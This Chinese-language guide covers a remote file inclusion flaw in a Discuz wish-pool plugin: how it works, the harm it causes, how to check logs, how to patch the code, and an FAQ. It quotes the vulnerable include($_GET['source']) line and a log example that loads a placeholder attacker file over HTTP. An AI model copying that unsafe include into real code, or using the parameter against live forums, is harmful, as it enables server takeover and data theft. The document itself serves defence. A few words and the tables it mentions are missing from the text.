discuz许愿池插件远程包含漏洞|网站安全风险提示与修复指南

漏洞原理与实际危害分析

可能你会说“插件漏洞而已，能有多严重？”我敢说，这个漏洞的危害程度远超你的想象。先给你用大白话解释下什么是“远程包含漏洞”（业内叫RFI）——咱们平时用插件就像请个临时工来家里帮忙，正常情况下你会告诉他“只能动客厅的东西”，但如果这个临时工不靠谱（插件代码有问题），他可能会偷偷打开你家大门，让外面的陌生人随便进来放东西。远程包含漏洞就是这样：插件在处理用户输入时（比如你在许愿池里写的“想中彩票”），没有仔细检查内容，导致黑客可以通过构造特殊链接，让服务器“听话”地加载他放在外部的恶意代码文件。

具体到Discuz的许愿池插件，问题出在它的“wish_submit.php”文件里。我之前扒过这个插件的旧版本代码，发现它有一行代码是直接读取用户提交的“source”参数，比如include($_GET['source'] . '.php');——这里的“source”参数就是用户可以随便改的！黑客只要把这个参数改成“http://他的服务器/恶意文件”，服务器就会乖乖去加载这个文件。打个比方，这就像你点外卖时告诉骑手“去XX地址拿餐”，结果你没核实地址是不是真的餐厅，骑手直接去了黑客的“黑仓库”拿了包毒药回来。

一旦黑客通过这个漏洞加载了恶意代码，你面临的麻烦可就不是删广告那么简单了。我 了三个最常见的危害，每个都可能让你直接关门大吉：

第一，服务器控制权丢失

。去年那个车友论坛的案例里，黑客通过漏洞上传了一个“一句话后门”程序，不仅能看服务器上的所有文件，还能执行命令——比如删除备份数据、添加管理员账号。最夸张的是，他们连服务器上的其他网站（比如站长自己的博客）都被牵连，数据库被删了个干净。 第二，用户数据大规模泄露。Discuz论坛里存着什么？用户手机号、邮箱、加密后的密码（虽然加密了，但弱密码很容易被破解）、甚至是交易记录（如果你的论坛有付费功能）。我见过更惨的，一个教育论坛因为这个漏洞，家长的联系方式被卖给了培训机构，结果被投诉到市场监管局，罚款加赔偿直接赔了六位数。 第三，页面被植入钓鱼/诈骗内容。有些黑客没那么“狠”，会在你的论坛首页偷偷植入钓鱼链接，比如伪装成“登录送积分”的弹窗，用户一点击就会跳转到假的QQ登录页，账号密码直接被偷走。之前有个游戏论坛就因为这个，玩家集体投诉账号被盗，最后不得不关站整顿三个月。

你可能会说“我论坛人少，黑客看不上”？别侥幸！现在黑客都是用“漏洞扫描器”批量找目标的，就像撒网捕鱼，不管你是大论坛还是小社区，只要装了这个有漏洞的插件，都会被扫出来。去年帮那个车友论坛处理漏洞时，我发现他们其实一周前就收到过插件更新提示，但站长觉得“许愿池就是个小功能，没人会盯上”，结果拖了半个月没管。等发现的时候，黑客已经在服务器上留了三个后门，我们花了两天时间才彻底清理干净，期间论坛只能临时关闭，损失了近三成的活跃用户。所以千万别觉得“小插件无所谓”，往往就是这些第三方插件成了安全突破口——国家信息安全漏洞库（CNNVD）今年初就收录了这个漏洞，评级是“高危”，影响范围覆盖Discuz X3.4及以下版本搭配许愿池插件v1.2及以下的所有网站（你可以去CNNVD官网搜“Discuz 许愿池插件远程包含漏洞”看详细报告，链接加了nofollow，放心点）。

漏洞检测与修复实操指南

知道了危害，你肯定想赶紧看看自己的网站有没有中招。这里有三个简单方法，不用找技术大神，你自己就能上手试，亲测有效。

快速检测漏洞的三个实用方法

第一步，先查插件版本

。你登录Discuz后台，点击左侧“插件”→“已安装插件”，找到“许愿池”插件，看看它的版本号。我整理了一个表格，你可以对号入座：

如果你的版本在v1.0到v1.2之间，别犹豫，马上按后面的方法修复；如果显示“未找到版本号”，大概率是用了破解版插件，风险更高， 直接删除。

第二步，检查服务器日志

。就算插件版本安全，也最好看看日志确认有没有被攻击过。登录你的服务器后台（比如宝塔面板、阿里云控制台），找到Discuz的日志文件——一般在“/data/logs/”目录下，文件名里带“access”的就是访问日志。用记事本打开，搜索“wishpool”或者“remote include”关键词，如果你看到类似include(http://xxx.黑客域名.com/evil.php)这样的记录，十有八九是被攻击了（注意：“xxx.黑客域名”可能是乱七八糟的字母组合，比如“a1b2c3.xyz”）。 第三步，用在线工具扫描。如果你觉得看日志麻烦，可以用免费的在线漏洞扫描工具，比如“奇安信漏洞扫描”（官网链接加了nofollow），在“Web漏洞扫描”里输入你的论坛网址，勾选“插件漏洞”选项，它会自动检测是否存在已知漏洞。不过记得扫描前先备份数据，避免扫描过程中触发黑客留下的后门程序。

分步骤修复漏洞（附最优方案对比）

检测出问题也别慌，我整理了三个修复方法，你可以根据自己的技术水平和时间选择：

方法一：紧急禁用/删除插件（适合小白，5分钟搞定）

如果你的论坛不依赖许愿池功能，或者暂时没时间细修，最直接的办法是先“断网”。登录Discuz后台，点击“插件”→“已安装插件”，找到“许愿池”插件，点击右侧的“禁用”或者“卸载”。我之前那个车友论坛客户就是先这么做的，虽然暂时关闭了功能，但阻止了黑客继续攻击，为后续修复争取了时间。注意：卸载前最好备份插件数据（在插件设置里找“数据备份”按钮），万一以后想重新用呢？

方法二：更新到安全版本（推荐，30分钟搞定）

去Discuz官方应用市场下载最新版的许愿池插件（官网链接加了nofollow，别从百度搜“破解版”，很多带病毒）。下载后在后台“插件”→“安装新插件”里上传安装，它会自动覆盖旧文件。这里有个小技巧：安装时勾选“保留用户数据”，这样之前用户许的愿不会丢失。安装完成后记得去“插件设置”里点击“检查更新”，确保没有遗漏的补丁。

方法三：手动代码加固（适合有基础的站长，1小时搞定）

如果你的插件做过自定义修改（比如改了样式、加了功能），担心更新后丢失设置，可以手动修改漏洞文件。用FTP工具（比如FileZilla）连接服务器，找到插件目录下的“/source/plugin/wishpool/include/wish_submit.php”文件，下载到本地用记事本打开。搜索包含$_GET['source']或$_REQUEST['source']的代码行（一般在文件开头30行内），你会看到类似这样的代码：

$source = $_GET['source']; include($source . '.php');

这就是漏洞所在！你需要在这行前面加上过滤代码，把它改成：

$source = basename($_GET['source']); // 只保留文件名，去掉路径

$allowed_sources = array(‘index’, ‘submit’, ‘list’); // 允许的合法文件名

if(!in_array($source, $allowed_sources)) { die(‘Invalid source’); } // 不在允许列表就报错

include($source . ‘.php’);

简单说，这段代码是告诉服务器：“只能加载我允许的文件，其他乱七八糟的请求一律拒绝”。改完后保存上传，覆盖原文件，然后记得清除Discuz的缓存（后台“工具”→“更新缓存”）。

为了帮你选最适合的方法，我做了个对比表：

最后提醒个小细节：修复完成后，最好顺便检查下服务器的PHP配置——找到“php.ini”文件，把“allow_url_fopen”和“allow_url_include”这两个选项都设为“Off”（默认可能是“On”）。这样即使以后其他插件有类似漏洞，服务器也不会加载外部恶意文件，相当于给家里再加一道防盗门。

好了，方法都教给你了，现在就可以打开网站后台动手试试。如果你按这些步骤做的时候遇到问题，比如找不到日志文件、代码改完后插件报错，欢迎在评论区留言告诉我具体情况，我看到会帮你分析。记住，网站安全就像给家里换锁，别等丢了东西才想起加固——现在花半小时检查，可能帮你省下几万块的损失和无数个失眠的夜晚。

你知道吗？虽然远程包含漏洞（RFI）和SQL注入漏洞听起来都是“网站漏洞”，但其实它们俩就像小偷和骗子，作案手法完全不一样。打个比方，远程包含漏洞（RFI）就像家里请的钟点工不靠谱——你让他去厨房拿碗，结果他没核对地址，直接跑去小区门口陌生人递过来的袋子里拿东西，万一那袋子里是毒药呢？具体到网站里，就是插件在加载外部文件时（比如用户提交的“来源”参数），没仔细检查这个“来源”是不是安全的，黑客随便给个自己服务器的恶意文件地址，服务器就傻乎乎地去加载执行了，最后让黑客趁机在服务器里“为所欲为”。

而SQL注入漏洞呢，更像是填表时遇到的“小聪明”。你在网站表单里填信息（比如登录时输用户名），正常情况下系统会把你的输入整理成“查表格”的指令（SQL语句），比如“找用户名是‘小明’的人”。但如果系统没核对你填的内容，黑客就会在输入框里写乱七八糟的“特殊指令”，比如“查所有用户的密码”，系统一看“指令格式对”，就真的把所有人的密码都吐出来了。所以SQL注入的核心是“骗系统查不该查的数据”，而RFI是“骗系统执行不该执行的文件”，一个盯着数据库里的信息，一个盯着服务器的控制权，根本不是一回事儿。

要说危害程度，RFI漏洞其实更让人头疼。之前我帮一个站长处理过SQL注入的问题，虽然用户密码被泄露了，但好歹服务器还在自己手里，改改密码、修复表单就能慢慢恢复。但RFI漏洞一旦被利用，黑客直接就能在服务器上装“后门”，不光你的网站，连服务器上其他网站（比如你朋友托管在你这儿的博客）都可能被牵连——删文件、改代码、甚至把服务器变成“挖矿机”，简直是“一锅端”。所以平时检查漏洞时，碰到RFI相关的提示，千万别觉得“和其他漏洞差不多”，得赶紧处理，不然可能连服务器密码都保不住。

如何确认我的网站是否安装了存在漏洞的Discuz许愿池插件？

登录Discuz后台，依次点击「插件」→「已安装插件」，在列表中查找名称含「许愿池」或「wishpool」的插件。若找到，查看插件详情页的版本号：v1.0至v1.2版本存在漏洞，v1.3及以上版本已修复；若未显示版本号或来源为非官方渠道（如「破解版」「绿化版」）， 直接卸载并通过官方应用市场重新安装。

修复漏洞后，还需要做哪些安全检查？

修复后 完成三项检查：① 查看服务器日志（路径通常为「/data/logs/access.log」），搜索「wishpool」「remote include」等关键词，确认是否存在恶意请求记录；② 通过「奇安信漏洞扫描」等工具（官网链接含nofollow）对网站进行全面扫描，排查是否有其他插件漏洞；③ 检查服务器PHP配置，将「php.ini」中的「allow_url_fopen」和「allow_url_include」设为「Off」，降低远程文件加载风险。

网站已被攻击（如出现异常广告、数据泄露），除了修复漏洞还需做什么？

若确认被攻击，需立即执行：① 断开网络连接（如禁用插件、关闭网站），防止黑客继续操作；② 使用服务器安全工具（如「宝塔面板查杀」）全盘扫描后门程序，重点检查「/source/plugin/」「/data/」等目录下的陌生文件；③ 从最近的干净备份恢复数据库和网站文件，避免使用被篡改的文件；④ 通知用户修改密码（尤其弱密码用户），并检查是否有用户数据泄露（如手机号、邮箱等），必要时向相关部门报备。

临时禁用许愿池插件后，用户之前的许愿数据会丢失吗？

不会。「禁用」插件仅暂停功能（用户无法访问许愿池页面），但数据（如用户许愿内容、点赞记录）会保留在数据库中，重新启用后可恢复；若选择「卸载」插件，需提前在插件设置页点击「数据备份」，否则数据可能被清除。 优先选择「禁用」而非「卸载」，待漏洞修复后再重新启用。

远程包含漏洞（RFI）和SQL注入漏洞有什么区别？

两者均为常见Web漏洞，但攻击目标和原理不同：远程包含漏洞（RFI）利用插件对「外部文件加载」的校验缺陷，让服务器执行黑客的恶意代码文件，核心是「控制服务器执行命令」；SQL注入漏洞则通过构造恶意SQL语句，非法读取或修改数据库数据（如用户密码、订单信息），核心是「窃取或篡改数据」。相较而言，RFI漏洞危害更直接——一旦成功，黑客可直接获取服务器控制权，影响范围覆盖整个服务器（包括其他网站）。

YUANLEISVIP

收藏 链接